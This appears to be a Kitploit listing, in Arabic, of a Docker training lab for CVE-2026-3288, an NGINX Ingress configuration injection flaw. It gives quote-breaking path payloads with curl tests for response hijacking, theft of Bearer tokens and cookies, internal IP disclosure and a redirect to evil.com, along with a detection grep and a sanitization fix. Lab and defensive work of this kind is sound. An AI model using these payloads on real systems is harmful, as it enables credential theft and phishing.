Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-3288-lab — # مختبر ثغرات قائم على Docker لثغرة CVE-2026-3288 الخاصة بحقن التكوين في NGINX Ingress، مع سكربتات استغلال، ومراقبة كشف، وإرشادات معالجة للتدريب الأمني المصرح به. | Kitploit
أدوات/GitHubGitHub/bvabhishek/cve-2026-3288-lab
أمن البنية التحتية السحابيةأمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتدقيق التكويناختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubbvabhishek/cve-2026-3288-lab

CVE-2026-3288-lab

# مختبر ثغرات قائم على Docker لثغرة CVE-2026-3288 الخاصة بحقن التكوين في NGINX Ingress، مع سكربتات استغلال، ومراقبة كشف، وإرشادات معالجة للتدريب الأمني المصرح به.

16منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

مختبر CVE-2026-3288 القابل للاستغلال (Docker)

حقن التكوين في NGINX Ingress Controller

⚠️ تحذير: يحتوي هذا المختبر على تكوينات قابلة للاستغلال عمدًا لأغراض التدريب الأمني المصرح به فقط

نظرة عامة على الثغرة

CVE-2026-3288 (CVSS 8.8 عالية) - حقن التكوين في NGINX Ingress Controller

  • الإصدارات المتأثرة: < v1.13.8, v1.14.4, v1.15.0
  • ناقل الهجوم: حقن علامة الاقتباس المزدوجة (") في تكوين المسار
  • التأثير: تنفيذ التعليمات البرمجية عن بُعد، كشف الأسرار، سرقة بيانات الاعتماد
  • ذات صلة: CVE-2026-24512 (حقن مسار مشابه)

السبب الجذري

لا تقوم دالة buildProxyPass() بتعقيم إدخال المسار قبل إدراجه في تكوين nginx، مما يسمح للمهاجمين بكسر السلاسل المقتبسة وحقن توجيهات nginx عشوائية.

مكونات المختبر

root@kitploit:~
CVE-2026-3288-lab/ ├── README.md # هذا الملف ├── docker-compose.yml # الإعداد الرئيسي للمختبر ├── docker/ │ ├── nginx/ │ │ ├── Dockerfile # إعداد NGINX القابل للاستغلال │ │ ├── nginx.conf # التكوين الأساسي │ │ └── vulnerable-config.conf # معالجة المسار القابلة للاستغلال │ └── backend/ │ ├── Dockerfile # تطبيق خلفي بسيط │ └── app.py # تطبيق Flask ├── exploits/ │ ├── exploit.py # سكربت الاستغلال الآلي │ ├── payloads.txt # مجموعة حمولات الاستغلال │ └── test-exploits.sh # اختبار جميع الاستغلالات ├── detection/ │ └── monitor-logs.sh # مراقبة محاولات الاستغلال └── cleanup/ └── cleanup.sh # إزالة جميع موارد المختبر

المتطلبات الأساسية

  • تثبيت Docker
  • تثبيت Docker Compose
  • Python 3.6+ (لسكربتات الاستغلال)
  • curl أو wget
  • 2GB RAM كحد أدنى

البدء السريع

1. تشغيل المختبر

root@kitploit:~
cd CVE-2026-3288-lab

# تشغيل البيئة القابلة للاستغلال
docker-compose up -d

# التحقق من الحالة
docker-compose ps

2. التحقق من التثبيت

root@kitploit:~
# اختبار تشغيل الخادم الخلفي
curl http://localhost:8080/

# اختبار تشغيل NGINX
curl http://localhost/

3. تشغيل الاستغلالات

root@kitploit:~
cd exploits

# الاستغلال الآلي
python3 exploit.py --all

# أو اختبار استغلالات فردية
bash test-exploits.sh

4. مراقبة السجلات

root@kitploit:~
# مراقبة سجلات NGINX للاستغلال
docker-compose logs -f nginx

# مراقبة الكشف
cd detection
bash monitor-logs.sh

5. التنظيف

root@kitploit:~
docker-compose down -v

سيناريوهات الهجوم

السيناريو 1: اختطاف الاستجابة

حقن توجيه return في nginx لتقديم محتوى يتحكم فيه المهاجم.

الحمولة:

root@kitploit:~
/api" return 200 "HACKED BY ATTACKER

الاختبار:

root@kitploit:~
curl 'http://localhost/api" return 200 "HACKED'

السيناريو 2: سرقة بيانات الاعتماد

عكس ترويسات Authorization في الاستجابة لسرقة رموز Bearer.

الحمولة:

root@kitploit:~
/login" return 200 "Token: $http_authorization

الاختبار:

root@kitploit:~
curl -H "Authorization: Bearer secret123" 'http://localhost/login" return 200 "Token: $http_authorization'

السيناريو 3: إعادة توجيه التصيد

إعادة توجيه المستخدمين إلى موقع تصيد يتحكم فيه المهاجم.

الحمولة:

root@kitploit:~
/" return 302 "https://evil.com/phishing

الاختبار:

root@kitploit:~
curl -I 'http://localhost/" return 302 "https://evil.com/phishing'

السيناريو 4: كشف عنوان IP الداخلي

تسريب معلومات الخادم الداخلية.

الحمولة:

root@kitploit:~
/" return 200 "Internal IP: $server_addr

الاختبار:

root@kitploit:~
curl 'http://localhost/" return 200 "Internal IP: $server_addr'

السيناريو 5: سرقة ملفات تعريف الارتباط

سرقة ملفات تعريف ارتباط الجلسة.

الحمولة:

root@kitploit:~
/" return 200 "Cookies: $http_cookie

الاختبار:

root@kitploit:~
curl -H "Cookie: session=abc123" 'http://localhost/" return 200 "Cookies: $http_cookie'

كيف يعمل

نمط الكود القابل للاستغلال

root@kitploit:~
# التكوين القابل للاستغلال
location ~ "^/api" {
    rewrite "(?i)/api" /backend break;
    proxy_pass http://backend;
}

الاستغلال

عندما يحتوي المسار على "، فإنه يكسر السلسلة المقتبسة:

root@kitploit:~
# إدخال المهاجم: /api" return 200 "HACKED
# النتيجة:
location ~ "^/api" return 200 "HACKED" {
    # التكوين الأصلي أصبح معطوبًا الآن
}

الكشف

مراقبة السجلات

root@kitploit:~
# مراقبة الأنماط المشبوهة
docker-compose logs nginx | grep -E '(return|rewrite|set).*"'

الكشف اليدوي

root@kitploit:~
# فحص تكوين NGINX بحثًا عن توجيهات محقونة
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf | grep -A5 "location"

المعالجة

إجراءات فورية

  1. التحقق من صحة الإدخال - تعقيم جميع مدخلات المسار
  2. تهريب الأحرف الخاصة - تهريب " و \ بشكل صحيح
  3. استخدام القوائم البيضاء - السماح فقط بالمسارات المعروفة والآمنة
  4. مراقبة السجلات - التنبيه على الأنماط المشبوهة

إصلاح الكود

root@kitploit:~
// قبل (قابل للاستغلال)
path := location.Path
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

// بعد (تم الإصلاح)
path := sanitizeQuotedRegex(location.Path)
config := fmt.Sprintf(`rewrite "(?i)%s" %s break;`, path, target)

أهداف التعلم

بعد إكمال هذا المختبر، ستفهم:

  1. ✅ كيف تعمل ثغرات حقن التكوين
  2. ✅ تأثير عدم كفاية تعقيم الإدخال
  3. ✅ تقنيات استغلال متعددة
  4. ✅ طرق الكشف عبر تحليل السجلات
  5. ✅ استراتيجيات المعالجة الصحيحة

استكشاف الأخطاء وإصلاحها

الحاويات لا تبدأ

root@kitploit:~
# فحص السجلات
docker-compose logs

# إعادة التشغيل
docker-compose restart

المنفذ قيد الاستخدام بالفعل

root@kitploit:~
# تغيير المنافذ في docker-compose.yml
# أو إيقاف الخدمات المتعارضة
sudo lsof -i :80

الاستغلالات لا تعمل

root@kitploit:~
# التحقق من تشغيل NGINX
docker-compose ps nginx

# فحص تكوين NGINX
docker exec cve-2026-3288-nginx nginx -t

إشعار أمني

  • ⚠️ فقط استخدم في بيئات المختبرات المعزولة
  • ⚠️ أبدًا لا تنشر على أنظمة الإنتاج
  • ⚠️ أبدًا لا تعرض للإنترنت
  • ⚠️ تأكد من الحصول على التصريح المناسب قبل الاختبار
  • ⚠️ اتبع ممارسات الإفصاح المسؤول

المراجع

  • استشارة CVE-2026-3288
  • إصلاح PR #14667
  • تحليل Sysdig

أُنشئ لأغراض التدريب الأمني المصرح به والبحث فقط

تنزيل الأداة